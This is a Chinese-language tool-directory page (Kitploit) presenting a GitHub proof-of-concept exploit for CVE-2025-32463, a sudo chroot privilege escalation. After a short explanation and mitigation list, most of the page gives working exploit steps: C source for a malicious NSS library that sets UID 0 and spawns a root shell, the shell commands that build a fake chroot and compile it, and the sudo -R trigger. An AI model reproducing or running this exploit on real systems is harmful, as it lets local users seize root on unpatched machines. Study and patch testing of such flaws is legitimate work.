Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32463-EXPLOIT — 针对 CVE-2025-32463 的 PoC 漏洞利用 - Sudo 权限提升 | Kitploit
工具/GitHubGitHub/k3ystr0k3r/cve-2025-32463-exploit
权限提升漏洞分析漏洞利用Shellcode渗透测试学习与教育Payload 开发二进制利用
GitHubk3ystr0k3r/cve-2025-32463-exploit

CVE-2025-32463-EXPLOIT

针对 CVE-2025-32463 的 PoC 漏洞利用 - Sudo 权限提升

查看仓库
9241年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-32463 - Sudo 权限提升

sudo 中存在一个影响 Linux/Unix 系统的权限提升漏洞。该缺陷源于当 sudo 与 -R(--chroot)选项一起使用时存在不正确的路径验证,允许攻击者通过恶意 NSS 库加载来提升至 root 权限。

根本原因

  • 当 sudo 在 chroot 环境(-R 选项)内执行命令时,它在错误条件下错误处理了 NSS(名称服务开关)库加载。
  • 不正确的路径验证(例如,未能清理 LD_LIBRARY_PATH 或 /etc/nsswitch.conf 中的路径)可能导致加载恶意库而不是合法的 NSS 库(例如 libnss_files.so)。
  • 这会导致以 root 权限执行任意代码。

影响

  • 拥有本地访问权限的攻击者可以利用此漏洞获取 root 权限。

缓解措施

  1. 更新 sudo 到最新的已修补版本。
  2. 限制 sudo 权限(尽可能限制 chroot 的使用)。
  3. 审计环境变量:
    • 限制 LD_LIBRARY_PATH。
    • 保护 /etc/nsswitch.conf。
  4. 在 /etc/sudoers 中强制设置 secure_path 以限制库搜索路径。

技术细节

组件漏洞触发条件
sudo -R不正确的 chroot 路径验证。
NSS错误期间不安全的库加载。
漏洞利用路径劫持 → 恶意库加载。

漏洞概述

CVE ID:CVE-2025-32463
受影响版本:Sudo 1.9.14 至 1.9.17
CVSS 评分:9.8(严重)
影响:本地权限提升至 root

攻击流程

  1. 攻击者创建恶意 NSS 库
  2. 设置伪造的 chroot 环境
  3. 触发 sudo 错误条件
  4. sudo 加载攻击者控制的库
  5. 恶意代码以 root 权限执行

漏洞利用步骤

步骤 1:验证漏洞

如果它响应 No such file or directory,则存在漏洞: sudo -R invalid invalid sudo: invalid: No such file or directory

步骤 2:创建临时工作区

首先,我们创建一个临时目录用于工作: TMP_DIR=$(mktemp -d -t sudobridge.XXXXXX) cd $TMP_DIR 这会创建一个唯一命名的临时目录并进入其中。mktemp 命令确保我们不会干扰现有的系统文件。

步骤 3:创建恶意库

我们需要创建一个 C 文件(bridge90.c),该文件将被编译为恶意库:

root@kitploit:~
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void bridge(void) {
  setreuid(0,0);  // 将真实和有效用户 ID 设置为 root
  setregid(0,0);  // 将真实和有效组 ID 设置为 root
  chdir("/");     // 切换到根目录
  execl("/bin/sh", "sh", "-c", "/bin/bash", NULL);  // 执行 shell
}

关键组件:

root@kitploit:~
__attribute__((constructor)) 确保函数在库加载时运行

setreuid 和 setregid 将权限提升至 root

execl 生成一个 bash shell

步骤 4:设置漏洞利用环境

mkdir -p bridge/etc echo "passwd: /bridge90" > bridge/etc/nsswitch.conf cp /etc/group bridge/etc/ mkdir libnss_ gcc -shared -fPIC -Wl,-init,bridge -o libnss_/bridge90.so.2 bridge90.c 说明:

root@kitploit:~
在 bridge/etc 中创建一个伪造的 chroot 环境

修改 nsswitch.conf 以指向我们的恶意路径

复制真实的 /etc/group 文件以保持合法性

为我们的恶意库创建一个目录

将 C 代码编译为与 NSS(名称服务开关)约定匹配的共享库

步骤 5:执行漏洞利用

sudo -R bridge bridge

此命令尝试使用我们精心构造的环境:

root@kitploit:~
第一个 bridge 是包含我们恶意配置的 chroot 目录

第二个 bridge 是要运行的命令(它将加载我们的库)

步骤 6:验证权限提升

成功利用后,验证 root 访问权限:

whoami # 应返回 "root" id -u # 应返回 "0"(root 的 UID)

root@kitploit:~
graph LR
    A[Malicious Library] --> B[Fake Chroot]
    B --> C[Trigger Error]
    C --> D[Library Load]
    D --> E[Root Execution]

免责声明

此 PoC 漏洞利用仅用于教育目的!对于您使用此漏洞利用可能造成的任何滥用,我不承担任何责任!

下载工具